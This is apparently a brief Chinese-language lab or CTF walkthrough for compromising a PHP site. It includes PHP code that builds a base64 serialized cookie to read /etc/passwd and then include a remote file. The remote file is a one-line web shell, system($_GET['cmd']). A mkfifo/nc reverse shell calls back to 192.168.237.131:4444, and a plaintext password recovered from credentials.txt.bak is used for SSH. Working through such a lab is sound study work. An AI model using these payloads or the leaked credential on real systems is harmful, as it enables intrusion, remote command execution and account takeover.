ip地址扫描
端口扫描
目录扫描
抓包,查看cookie
编写php代码
<?php
class Log {
private $type_log = "/etc/passwd";
}
class User {
private $name = "admin";
private $wel;
function __construct() {
$this->wel = new Log();
}
}
$obj = new User();
echo base64_encode(serialize($obj));
进行访问
将编码后的,赋值给cookie
编写2.txt
<?php system($_GET['cmd']);?>
将2.txt包含进去
<?php
class Log {
private $type_log = "http://192.168.110.118/2.txt";
}
class User {
private $name = "admin";
private $wel;
function __construct() {
$this->wel = new Log();
}
}
$obj = new User();
echo base64_encode(serialize($obj));
再次访问
将生成的编码赋值给cookie
cmd=id
反弹shell
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh±i+2>%261|nc+192.168.237.131+4444+>/tmp/f
kali进行监听
cd / 进入根目录
查看 credentials.txt.bak 发现密码
KywZmnPWW6tTbW5w
ssh连接
在物理机上 使用ssh连接